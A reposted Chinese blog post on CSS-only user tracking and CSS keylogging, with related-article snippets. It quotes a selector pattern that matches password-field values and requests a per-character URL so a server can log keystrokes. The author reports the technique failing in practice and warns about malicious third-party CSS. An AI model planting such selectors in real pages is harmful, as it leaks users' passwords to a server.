資訊專欄INFORMATION COLUMN
摘要:隨著這個思路,我自己嘗試了一下構造選擇器去匹配用戶的輸入,選擇器語法參考另外在的幫助下也找到了用來獲取按鍵輸入的腳本,其實想法都差不多,腳本傳送門搜到的版本。
今天在看技術博客的時候發現這個帖子,感覺挺有趣的,于是就去挖了一下,問題已經是老問題,但是還是有很多值得注意和學習的地方。
原文帖是 僅用CSS實現網頁追蹤分析,主要講的是通過CSS來記錄用戶的交互操作和獲取一些基本信息。我的第一感覺就是可以用來做推薦系統的用戶交互記錄,通過這種方式能夠記錄用戶鼠標在哪些元素上懸停的時間,以及點擊的操作,等等。
瀏覽器熏染HTML文件是從上而下渲染的(需要加載完.css文件之后才會繼續向下渲染),要是加入許多這些追蹤用戶樣式的代碼可能會影響頁面的加載效率,但是要是有目的性的去使用這些功能,或許就比較值得了,比如說記錄用戶的按鍵輸入。
隨著這個思路,我自己嘗試了一下構造CSS選擇器去匹配用戶的輸入,CSS選擇器語法參考,另外在Google的幫助下也找到了用來獲取按鍵輸入的CSS腳本,其實想法都差不多,腳本傳送門-搜到的版本 CSS-Keylogging。
主要思路是通過類似input[type="password"][value$="x"]{ background-image: url("http://localhost:3000/x"); }的方式來進行獲取按鍵,意思就是input標簽的type值為password的input中將value以x結尾的背景設置為url所指向的背景,但其實這個url不是圖片背景而是一個指向傳送按鍵信息的鏈接。之后你懂得通過服務端獲取url中的path就能取到值了。然后對每個按鍵到設置一個CSS腳本即可。
但其實這種方式我嘗試了很多次沒有成功,瀏覽器不會主動將input中輸入的值存在value中,所以CSS匹配的一直是初始化狀態下的value屬性值,只有那些將value同步的框架才可能引發這些危害。
但是有一點可以確認,可以通過css中地url發送get請求。這讓我想到jsonp的原理,通過像構造類似script標簽中地src屬性的方式來解決跨域問題,要是不注意第三方庫,很可能也存在這種惡意腳本的加載。
文章版權歸作者所有,未經允許請勿轉載,若此文章存在違規行為,您可以聯系管理員刪除。
轉載請注明本文地址:http://specialneedsforspecialkids.com/yun/97432.html
摘要:隨著這個思路,我自己嘗試了一下構造選擇器去匹配用戶的輸入,選擇器語法參考另外在的幫助下也找到了用來獲取按鍵輸入的腳本,其實想法都差不多,腳本傳送門搜到的版本。 今天在看技術博客的時候發現這個帖子,感覺挺有趣的,于是就去挖了一下,問題已經是老問題,但是還是有很多值得注意和學習的地方。 showImg(https://segmentfault.com/img/bVbgudI?w=685&h...
摘要:寫在前面月到這天,前端提升營,騰訊大佬們分享個人經驗,使出各種前端方面的大招。并且減輕服務器的負擔,的原則是按需取數據,可以最大程度的減少冗余請求和響應對服務器造成的負擔。控制表單控件的禁用狀態。 寫在前面 5月24到30這7天,IMWeb前端提升營,騰訊大佬們分享個人經驗,使出各種前端方面的大招。從中學習了很多前端方面的知識,也get到了前端學習的方法論,還有一些算法知識等等。 現將...
摘要:后代選擇器,可以選擇子元素,卻沒法選擇父元素。這里說的有關聯指的是相近或者相反,比如子選擇器和后代選擇器就是比較相近的如果要實現鼠標相關的功能,可能就會聯想到等選擇器。 首先看一個效果,注意地址欄的變化 showImg(https://segmentfault.com/img/remote/1460000016937042?w=1058&h=433); 然后思考一下,用css如何實現?...
摘要:后代選擇器,可以選擇子元素,卻沒法選擇父元素。這里說的有關聯指的是相近或者相反,比如子選擇器和后代選擇器就是比較相近的如果要實現鼠標相關的功能,可能就會聯想到等選擇器。 首先看一個效果,注意地址欄的變化 showImg(https://segmentfault.com/img/remote/1460000016937042?w=1058&h=433); 然后思考一下,用css如何實現?...
閱讀 468·2021-10-09 09:57
閱讀 473·2019-08-29 18:39
閱讀 814·2019-08-29 12:27
閱讀 3030·2019-08-26 11:38
閱讀 2671·2019-08-26 11:37
閱讀 1296·2019-08-26 10:59
閱讀 1382·2019-08-26 10:58
閱讀 993·2019-08-26 10:48
